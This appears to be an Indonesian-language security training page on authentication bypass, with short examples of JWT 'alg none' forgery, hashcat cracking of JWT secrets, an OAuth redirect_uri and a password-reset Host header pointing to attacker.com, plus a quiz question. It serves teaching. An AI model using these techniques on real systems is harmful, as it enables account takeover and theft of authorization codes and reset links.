Kembali ke Roadmap
// PHASE 3 · Authentication Bypass

Authentication Bypass

Authentication Bypass

Kerentanan autentikasi memungkinkan attacker mengakses sistem tanpa credential yang valid atau mengambil alih akun orang lain.

JWT Attacks

# JWT: header.payload.signature # Decode di jwt.io # Attack 1: Algorithm None # Ubah alg dari HS256 ke none, hapus signature {"alg":"none","typ":"JWT"} {"user":"admin","role":"admin"} # (tanpa signature) # Attack 2: Weak Secret Brute Force hashcat -a 0 -m 16500 token.txt wordlist.txt

OAuth Misconfiguration

# Open redirect dalam OAuth flow https://auth.example.com/oauth? client_id=app& redirect_uri=https://attacker.com& ← steal auth code! response_type=code # State parameter missing → CSRF on OAuth

2FA Bypass Techniques

Password Reset Flaws

# Host header injection POST /reset-password HTTP/1.1 Host: attacker.com ← Link reset dikirim ke attacker! ... email=victim@example.com # Predictable reset token # Token berupa timestamp atau hash MD5 dari email
// CEK PEMAHAMAN
JWT "Algorithm None" attack berhasil ketika kondisi apa?
AJWT sudah expired
BServer tidak memvalidasi dan menerima token tanpa signature
CToken terlalu panjang
DServer menggunakan HTTPS
Insecure Direct Object Reference (IDOR) Cross-Site Request Forgery (CSRF)